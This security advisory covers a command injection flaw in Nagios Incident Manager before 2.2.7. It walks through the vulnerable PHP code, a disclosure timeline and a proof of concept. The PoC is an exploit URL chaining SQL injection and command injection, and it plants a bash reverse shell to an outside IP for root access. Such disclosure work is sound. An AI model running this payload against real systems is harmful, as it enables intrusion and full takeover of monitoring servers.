Nagios Incident Manager < 2.2.7 Host Remote Code Execution

Summary

A Command Injection vulnerability in Nagios Incident Manager (component of Nagios XI) before 2.2.7 allows authenticated attackers to achieve remote code execution via a malicious host record.

Product Description (from vendor)

“Resolve network incidents, collaborate with team members, and track incident history”. For more information visit https://www.nagios.com/products/nagios-incident-manager/.

CVE(s)

Details

Root Cause Analysis

The Nagios XI API /nagiosxi/includes/components/nagiosim/nagiosim.php allows interaction with Nagios IM through the file nagiosxi/basedir/html/includes/components/nagiosim/nagiosim.php:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<?php
[1] $cmd = get_core_comment($host, $service, $title, $status);
[3] exec($cmd, $output);
    [...]
    function get_core_comment($host, $service, $title, $status)
    {
        [...]

        if ($service != '') {
            $ackCommand = 'ADD_SVC_COMMENT';
[2]         $cmdstring = "/bin/echo '[$now] $ackCommand;$host;$service;$persistent;$username;$message' > $pipe";
        }
        [...]

        return $cmdstring;
    }

At [1], the host variable is read from the database query shown in CVE-2020-9204. At [2], it is used into a command string without sanitization nor validation. At [3] the assembled command is run.

An authenticated attacker can achieve Remote Code Execution through a malicious host record in a network incident.

Proof of Concept

Note: this PoC exploits CVE-2019-9204, CVE-2019-9166 and CVE-2019-9203 too to achieve root remote code execution.

  1. Log-in Nagios XI
  2. Start a TCP listener on a local port
  3. Edit with the correct address/port and navigate to [host]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=1'UNION%20select%201,2,3,4,"';echo%20'print(\"bash+-i+>%26+/dev/tcp/10.13.37.42/8080+0>%261+%23\")%3b'>>+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x using the logged-in session
  4. Notice a root shell spawns

Impact

An authenticated attacker can take control of Nagios XI.

Remediation

Upgrade to Nagios IM 2.2.7 or later. (Note: we didn’t verify the patch.)

Disclosure Timeline

This report was subject to Shielder’s disclosure policy:

  • 25/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and releases Nagios IM 2.2.7
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

This advisory was first published on https://www.shielder.com/advisories/nagiosim-host-remote-code-execution/

Date

10 April 2019